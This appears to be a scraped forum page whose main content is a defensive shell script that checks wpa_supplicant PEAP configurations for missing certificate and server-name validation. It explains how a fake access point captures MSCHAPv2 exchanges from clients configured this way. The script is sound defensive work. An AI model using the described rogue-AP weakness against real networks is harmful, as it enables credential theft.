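A defender-side check for the client misconfiguration the Countermeasures section describes, added here as an example and not part of the original article: a POSIX shell function that inspects a wpa_supplicant PEAP network block and flags the settings that would let a client complete the TLS tunnel with any RADIUS server, which is exactly what hands the MSCHAPv2 challenge/response to a fake AP. The two sample blocks, the CA path and the RADIUS server name are constructed placeholders.

```shell
#!/bin/sh
# Added example (not from the original article): lint wpa_supplicant PEAP
# network blocks for missing server validation.

# Constructed sample: a client block like the one in the article's Connect
# section. No ca_cert and no server-name match, so any AP that presents a
# certificate is accepted and the inner MSCHAPv2 exchange is exposed.
WEAK_CONF='network={
    ssid="CorpNetwork"
    key_mgmt=WPA-EAP
    eap=PEAP
    identity="TonyTestUser"
    password="cheekymonkeyrox"
    phase1="peaplabel=0"
    phase2="auth=MSCHAPV2"
}'

# Constructed sample: the same network with the server pinned to a CA and a
# hostname. The CA path and RADIUS name are placeholders, not real values.
HARDENED_CONF='network={
    ssid="CorpNetwork"
    key_mgmt=WPA-EAP
    eap=PEAP
    identity="TonyTestUser"
    password="cheekymonkeyrox"
    ca_cert="/etc/ssl/certs/corp-radius-ca.pem"
    domain_suffix_match="radius.corp.example"
    phase1="peaplabel=0"
    phase2="auth=MSCHAPV2"
}'

# check_peap_block CONF
# Prints one FINDING line per weak setting. Returns 0 when the block pins the
# RADIUS server (or is not an EAP network at all), 1 when it does not.
check_peap_block() {
    conf="$1"
    rc=0

    # Only WPA-EAP blocks are in scope; PSK networks have no RADIUS server.
    if ! printf '%s\n' "$conf" | grep -q 'key_mgmt=WPA-EAP'; then
        echo "not an EAP network block, nothing to check"
        return 0
    fi

    # Without ca_cert, wpa_supplicant does not verify the server certificate
    # chain, so a self-signed certificate from a rogue AP is accepted.
    if ! printf '%s\n' "$conf" | grep -Eq '^[[:space:]]*ca_cert='; then
        echo "FINDING: no ca_cert set; any server certificate is accepted"
        rc=1
    fi

    # A trusted CA alone is not enough: any certificate that CA issued would
    # pass. One of the name-matching options binds the tunnel to the real
    # RADIUS server.
    if ! printf '%s\n' "$conf" | \
        grep -Eq '^[[:space:]]*(domain_suffix_match|domain_match|subject_match|altsubject_match)='; then
        echo "FINDING: no server-name match; any certificate from the trusted CA is accepted"
        rc=1
    fi

    return $rc
}

# Stand-alone run: report on both sample blocks.
echo "== weak block =="
check_peap_block "$WEAK_CONF" || echo "=> would accept a fake RADIUS server"
echo "== hardened block =="
check_peap_block "$HARDENED_CONF" && echo "=> server validation pinned"
```

Point the function at each `network={ ... }` block of a deployed wpa_supplicant.conf (or at a config pushed by your management tooling) to find clients that the fake AP in this article would capture.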
  22. Security Hub
Security Hub - The IT Security Professionals Social Network
Link: https://securityhub.io/index.php
Opinions? Suggestions?
  23. In plain terms: FREE TICKETS TO DEFCAMP. Link: DefCamp2015 Raffle | Cazacu Bogdan
  24. That's all, Gigi Becali for prime minister!